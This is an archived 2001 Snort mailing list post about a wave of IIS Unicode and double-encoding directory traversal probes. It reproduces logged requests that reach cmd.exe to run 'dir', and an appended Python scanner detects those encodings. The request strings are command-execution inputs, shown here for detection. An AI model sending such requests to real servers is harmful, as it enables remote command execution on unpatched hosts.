Snort mailing list archives

Re: WEB-IIS Cmd attack


From: Erek Adams <erek () theadamsfamily net>
Date: Tue, 18 Sep 2001 09:09:24 -0700 (PDT)

On Tue, 18 Sep 2001, cdowns wrote:

> What is the actual signature as I have seen nothing yet on my servers in
> NH

Give it time, give it time....

What I'm seeing is the following:

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"

And repeats, ad nauseam.

There are some others, but basically still just your standard unicode string
attack.

Damn...  This one looks worse than CR.  *sigh*

-----
Erek Adams
Nifty-Type-Guy
TheAdamsFamily.Net
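As an added example (not from Erek's post or from Snort itself), a small Python log scanner that normalizes request paths the way a lenient decoder would, so the plain, double-encoded (%255c) and overlong UTF-8 (%c1%1c) variants shown above all collapse to the same traversal-to-cmd.exe request and can be tagged by obfuscation type. The sample log lines are constructed from the post, with one benign line added; the tag names are this example's own.

```python
import re
from urllib.parse import unquote

# Combined-log-format lines constructed from the post (addresses are placeholders).
SAMPLE_LOG = """\
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
10.0.0.5 - - [18/Sep/2001:09:05:00 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})')
# Two-byte sequences with a %c0/%c1 lead byte: overlong UTF-8 forms that the
# flawed IIS decoder accepted as a path separator (e.g. %c0%af, %c1%9c, %c1%1c).
OVERLONG_RE = re.compile(r'%c[01]%[0-9a-z]{2}', re.I)

def normalize(raw_path: str) -> str:
    """Approximate what a lenient decoder sees: overlong forms become '/',
    double percent-encoding is undone (%255c -> %5c -> '\\'), and backslashes
    are folded into forward slashes."""
    path = OVERLONG_RE.sub('/', raw_path)
    path = unquote(unquote(path))
    return path.replace('\\', '/').lower()

def classify(raw_path: str):
    """Return the detection tags for one request path (empty list = benign)."""
    tags = []
    norm = normalize(raw_path)
    if '/../' in norm:
        tags.append('traversal')
    if 'cmd.exe' in norm:
        tags.append('cmd.exe')
    if '%25' in raw_path.lower():
        tags.append('double-encoded')
    if OVERLONG_RE.search(raw_path):
        tags.append('overlong-utf8')
    return tags

def scan(log_text: str):
    """Return (client, timestamp, raw_path, status, tags) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, ts, _method, path, status = m.groups()
        tags = classify(path)
        if tags:
            hits.append((client, ts, path, int(status), tags))
    return hits

if __name__ == '__main__':
    for client, ts, path, status, tags in scan(SAMPLE_LOG):
        print(f'{client} {ts} {status} {",".join(tags)} {path}')
```

Note that every hit in the post returned 404, so the status alone says nothing about whether the probe would have succeeded against an unpatched host; the tags come from the request path, not the response.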


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
